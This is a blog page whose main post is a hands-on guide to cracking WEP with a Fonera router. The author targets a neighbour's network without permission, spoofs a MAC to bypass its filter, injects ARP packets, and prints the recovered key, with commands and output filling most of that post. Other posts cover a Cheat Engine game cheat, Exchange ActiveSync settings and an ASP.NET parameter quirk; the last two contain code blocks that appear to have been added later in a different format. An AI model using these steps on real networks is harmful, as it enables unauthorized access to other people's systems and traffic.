WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just too good to be true! So here is a little rundown on how to do this easily. This guide can also be used for any other hardware, but it has some special info just for the Fonera.

Here is a guide to cracking your Fonera router:
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a Linux computer for your pocket, much like your iPhone if you have one. The big difference is that this Linux pocket computer is great for wlan use. First start an SSH session to the router and log in.

We need to set up the wlan card for our use. If you're connected via the “Legend” wlan you have to keep that. I prefer to connect via cable to the router and then destroy the “Legend” network before I begin (wlanconfig ath0 destroy). But even if you destroy it you can still run the rest of the guide with ath1.

So let's begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

[ps]wlanconfig ath1 create wlandev wifi0 wlanmode monitor[/ps]

Then we want a list of networks around us that we can attack. With airodump-ng and just the interface as parameter we get a list of the wlans available to us.

[ps]airodump-ng ath1[/ps]

The router responds with a list of networks and information about encryption, and you can also see a list of clients that the card picks up.
In the list below no clients are seen, but they usually show up; this is just a quick scan I did to show the principle. When you have your list just hit CTRL + C to get back to the prompt.

[ps]CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes[/ps]

My unlucky neighbour who has chosen to call his/her wlan MAD will be today's target. I selected this because it's MAC controlled: if the correct MAC isn't in the router's “Allowed list” or “White list” I will be unable to connect. To handle the amount of data that I need to collect to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First create an account on your Windows box whose name doesn't have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

[ps]mkdir share[/ps]

Then mount the share to that folder like this:

[ps]mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME> -o username=<USERNAME>,password=<PASSWORD> /mnt/share[/ps]

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

[ps]airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

So what have we done now? We provided airodump-ng with some important information:

[ps]-c 3[/ps]

We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

[ps]--bssid 00:18:4D:8C:52:0E[/ps]

We supplied the MAC address of the wlan base so it knows what to listen for.

[ps]-w /mnt/share/MAD[/ps]

-w stands for “write”: we want airodump-ng to dump the information into the file MAD on the Windows box share.

[ps]ath1[/ps]

The wlan instance to use.

The router will also show us the information in real time while it collects the IVs (initialization vectors) that we need for the crack.

[ps]CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5[/ps]

Now you can see the client that is connected as well. When I started attacking this network I didn't know it had a MAC filter running, but I found out pretty quickly when I couldn't associate or authenticate with it. If you can't do an association like the one below, or if packet injection fails (it's not sending any packets), you are probably talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

[ps]aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)[/ps]

So what did I try here? I did a “Fake Authentication” against the router to see if it allows me to connect. Please note the -h option (my client MAC is the same as the client I found earlier).
In this screenshot I had already faked my MAC to be able to connect to the router. I didn't save any screenshot of the failure. A quick rundown of the command above:

[ps]-1[/ps]

Fake Authentication attack

[ps]0[/ps]

How often to send an Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate).

[ps]-e "MAD"[/ps]

The SSID of the router.

[ps]-a  00:18:4D:8C:52:0E[/ps]

The MAC address of the router.

[ps]-h  00:22:43:6E:BD:F5[/ps]

The MAC address of the client. In this case a spoofed one to get around the MAC filter, but in all other cases you can use your original MAC or just 1:2:3:4:5:6.

[ps]ath1[/ps]

The wlan instance to use.

So this raises two questions. First how do you get your MAC?


This command will show you all the info on all the network devices you have, and you can extract the MAC address of wifi0 in this case.
Second question: how do I spoof my MAC?

[ps]ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up[/ps]

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like “Device Not Ready”.
Just try to destroy all the athX instances before you take wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing, so let's get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start airodump-ng with the file write option again:

[ps]airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

Then start a second SSH client, connect to the FON and log in again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250,000 for us to be able to crack a 128-bit key and over 800,000 for heavier keys. You can collect all that data by just listening to the traffic, but it will take days or even weeks. We can do it much quicker ourselves. In the second window/session we will start a packet injection attack of the ARP kind. In short, ARP is the way network gear keeps track of which device has which IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initialization vector), and that's what we count as data and then use to crack the key. So let's get the IVs coming!

[ps]aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1[/ps]

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the “packets sent” counter stopping, that usually just means you lost your association with the router. Just hit CTRL + C and run the “Fake Authentication” attack again. If this happens over and over again, change the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that, just open a third window/session so you can have it all running at once.

Once we have collected enough IVs we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and, if no key is found, restart the crack every 5,000 IVs collected. However, this is not a job for the FON due to its limited processing power. I usually use my Linux box or my Windows box where I have more computing power. The Windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

[ps]aircrack-ng c:tempfoneramad_mac-01.cap[/ps]

The result will be something like this:

[ps]Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%[/ps]

As you can see I only needed a little over 170,000 IVs to do this, and when the crack was successful I could stop the attack on the network.
So now we have the key:

[ps]04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A[/ps]

People who get this far still ask me one question: “How do I use that key from Windows?”
The routers accept both ASCII phrases and hex keys like the one above. Just remove the : from the key and Windows will be able to connect to the network.

Youtube to MP3

I have tested a lot of the programs available to do this. A friend of mine needed a lot of, let's say not mainstream, music for a party. This webpage is the best tool I have tried for this!


Exchange 2007 Active sync screen lock issue with iPhone

A while ago I updated an Exchange Server 2007 with the latest service pack for a client. The SP automatically added a new Exchange ActiveSync Mailbox Policy that required the connected devices to be password protected when the screen went dark. It’s a good idea for many security reasons but the users didn’t like it at all, and the customer is always right. Changed the default policy so password wasn’t required anymore and all was good… for a while.

Then the iPhone users started complaining that their auto lock setting was restricted: they could select 1 to 5 minutes, but the alternative “Never” was gone. This setting, when no password is configured, just turns the screen black after a few minutes of inactivity. Again I thought that would be a good thing for many reasons; the iPhone uses enough battery as it is. As always, if you can't have it you need it, want it and must have it. So I reviewed the settings again. There was a setting called “Time without user input before password must be re-entered (in minutes)” that was set to 15 minutes, but it was grayed out. After testing a lot of things I finally executed a PowerShell command to solve the issue. Then I noticed that the grayed out option had changed to 0 minutes. So I tested just checking the “Require password” check box, bringing all the grayed out options back, setting the timeout to 5 minutes, unchecking the “Require password” option, again graying out the setting I had just changed, then applying. Then the “Never” option disappeared from the iPhone again. So MS did it again, messed up the GUI: a grayed out option shouldn't affect anything.
Thank god for PowerShell so you can get down with the software properly!
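Rather than trusting what the GUI shows, the values a policy actually pushes to the devices can be read and set from the Exchange Management Shell. The following is an added example, not the command from the post (which isn't quoted above); it assumes the affected policy is the built-in one named "Default" and uses the Exchange 2007 ActiveSync mailbox policy cmdlets:

```powershell
# Added example (not the post's own command). Assumes the affected policy is
# the built-in one called "Default"; substitute your policy name if it differs.

# Show what the policy really enforces on the devices, independent of the GUI.
Get-ActiveSyncMailboxPolicy -Identity "Default" |
    Format-List Name, DevicePasswordEnabled, MaxInactivityTimeLock

# Keep the password requirement off and remove the inactivity lock that the
# grayed-out GUI field was still sending to the iPhones.
Set-ActiveSyncMailboxPolicy -Identity "Default" `
    -DevicePasswordEnabled $false `
    -MaxInactivityTimeLock Unlimited

# Confirm the change took effect before the devices next sync.
Get-ActiveSyncMailboxPolicy -Identity "Default" |
    Select-Object DevicePasswordEnabled, MaxInactivityTimeLock
```

Reading the policy back with Get-ActiveSyncMailboxPolicy is the useful habit here: it shows the value the devices receive regardless of whether the console has grayed the field out, so a mismatch between the GUI and the policy object is visible straight away.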

Hope the pictures give you a clear picture of what I mean. If you have any questions hit me with a comment and I will try to answer your questions.

SAS Zombie Assault Cheat / Hack

Today I will give you a simple guide to cheating on flash games with the help of Cheat Engine version 5.5. The flash game of choice today is SAS 2: Zombie Assault. It doesn't really matter what flash game we are talking about, the concept is the same! I did find a way to get more money, but I couldn't find the location of the money counter to update it directly. If anyone has some input on that I would really like to hear it!

So let’s get to work! First start the game, from your favorite supplier or here: http://www.ninjakiwi.com/Games/Action/Play/SAS-Zombie-Assault-2.html

Then start Cheat Engine. If you don’t have it get it here: http://www.cheatengine.org/downloads.php

Next up is to attach Cheat Engine to the browser process. Click the computer icon in the top left corner of Cheat Engine to bring up the process list. Then look for your browser and attach to it. Now we need some values to search for. Start the game and look at what values you have and what you would like to change.

We have our ammo counter in the lower left corner, and we have the cash. In other games you may have other things you would like to change.

Let's start with the ammo counter for the pistol (this will work for any other gun you get later in the game, even sentry guns).

1. Type the number of bullets you have left in your gun into the “Value” field of Cheat Engine and then hit “First Scan”.
2. When the scan has finished you will have a bunch of results; I got almost 200000 results. We can't change all of them hoping for the best, we need to dig deeper.
3. Go back to the game and waste some more ammo.
4. Take the new ammo count, put it into the “Value” field of Cheat Engine and hit “Next Scan”.
5. If you now have only one result you have been lucky. If not, repeat steps 3 and 4 until you only have one result in the list.
6. Now double click the result; it will pop up in the list at the bottom of the screen.
7. Check the box “Frozen” for the value and that gun will never run out of bullets.

You can do exactly the same with the grenades, but you still have to get some first. With the sentry guns it's the same, but you're not in control of the firing, so wait till the gun is not shooting and then search for its ammo count.

Now we get to the money. As I wrote earlier I was unable to find the money variable in memory, but I didn't put much time into it either. There is however one way to get more money: the wave bonuses. When you complete a wave you always get a bonus. On the higher waves it's $500. To get more money do this:

1. Search for the number of the current wave.
2. Wait for the next wave; when the wave indicator has changed, “Next Scan” for the new value.
3. Repeat 1 and 2 until you have only 2 results left.
4. Get them down into the list and freeze them.
5. Change them to a wave that gives good money but isn't too hard with your current gear.
6. Complete the wave and get the bonus; the bonus will be repeated over and over again until you unfreeze the values.

Hope this has been helpful for you all.

Must declare the scalar variable @ID

Was just burning the midnight oil on a project for a client, working with ASP.NET for the first time in ages. Making a quick fix, adding a new form for editing customer details, I used the SqlDataSource control. Usually I work with the SqlCommand in SqlDataClient directly, but now I needed paging and sorting fixed quick and easy! I had a really big problem with the select command parameters. When you use them with the SqlCommand you declare them with an @ prefix in the select command like this:

[sql]SELECT * FROM Customers WHERE CustomersID = @ID[/sql]

(SELECT * is a sin, I know!)

Then declare the variable as: SqlCommand.Parameters.Add(new SqlParameter(“@ID”, SqlDbType.Int))
I received errors like “Must declare the scalar variable @ID” and so on. Checked, double checked and triple checked… The variable was defined!
But no! Some idiot at MS decided to think outside of the box and the declaration for the SqlDataSource control should be without the @!

So not like this:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
    <SelectParameters>
        <asp:Parameter Name="@ID" Direction="Input" />
    </SelectParameters>
</asp:SqlDataSource>[/vbnet]

But instead this:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
    <SelectParameters>
        <asp:Parameter Name="ID" Direction="Input" />
    </SelectParameters>
</asp:SqlDataSource>[/vbnet]
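For contrast, here is the code-behind route the post mentions, written out as an added example (not the post's own code): a SqlCommand lookup where the parameter keeps its @ prefix, matching the placeholder in the SQL text. It assumes a connection string named DB_CONN, as in the markup above, and a Customers table with an integer CustomersID column and a Name column; the class and function names are my own.

```vbnet
' Added example, not from the post. Assumes a connection string named DB_CONN
' and a Customers table with an integer CustomersID column and a Name column.
Imports System.Configuration
Imports System.Data
Imports System.Data.SqlClient

Public Class CustomerLookup

    ' Code-behind route: with SqlCommand the parameter is declared WITH the @
    ' prefix, exactly as the placeholder appears in the SQL text. The value is
    ' sent as a typed parameter and is never concatenated into the query.
    Public Shared Function LoadCustomer(ByVal id As Integer) As DataTable
        Dim result As New DataTable()
        Dim connStr As String = ConfigurationManager.ConnectionStrings("DB_CONN").ConnectionString

        Using conn As New SqlConnection(connStr)
            Using cmd As New SqlCommand("SELECT CustomersID, Name FROM Customers WHERE CustomersID = @ID", conn)
                ' Same declaration the post uses, with the value attached.
                cmd.Parameters.Add(New SqlParameter("@ID", SqlDbType.Int)).Value = id
                conn.Open()
                Using reader As SqlDataReader = cmd.ExecuteReader()
                    result.Load(reader)
                End Using
            End Using
        End Using

        Return result
    End Function

End Class
```

The SqlDataSource markup above does the same job declaratively, and the only difference is the parameter name: `Name="ID"` in `<asp:Parameter>` while the SelectCommand text still reads `@ID`, because the control adds the prefix itself when it builds the command. Both routes keep the ID out of the SQL text, so a value arriving from a query string or form field cannot alter the query.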